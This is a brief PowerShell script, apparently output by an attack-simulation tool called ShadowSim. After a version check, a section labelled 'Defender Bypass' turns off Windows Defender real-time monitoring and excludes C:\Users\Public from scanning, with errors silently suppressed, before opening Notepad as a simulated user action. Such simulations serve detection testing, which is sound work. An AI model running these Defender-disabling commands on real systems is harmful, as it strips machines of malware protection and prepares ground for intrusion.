# Generated by ShadowSim
# Timestamp: 2025-08-03 15:01:34.857701

if ($PSVersionTable.PSVersion.Major -lt 5) { exit }

# --- Defender Bypass ---
try {
  Set-MpPreference -DisableRealtimeMonitoring $true
  Add-MpPreference -ExclusionPath "C:\Users\Public"
} catch {}

# --- Simulated User Actions ---
try {
  Start-Process "notepad.exe"
} catch {}
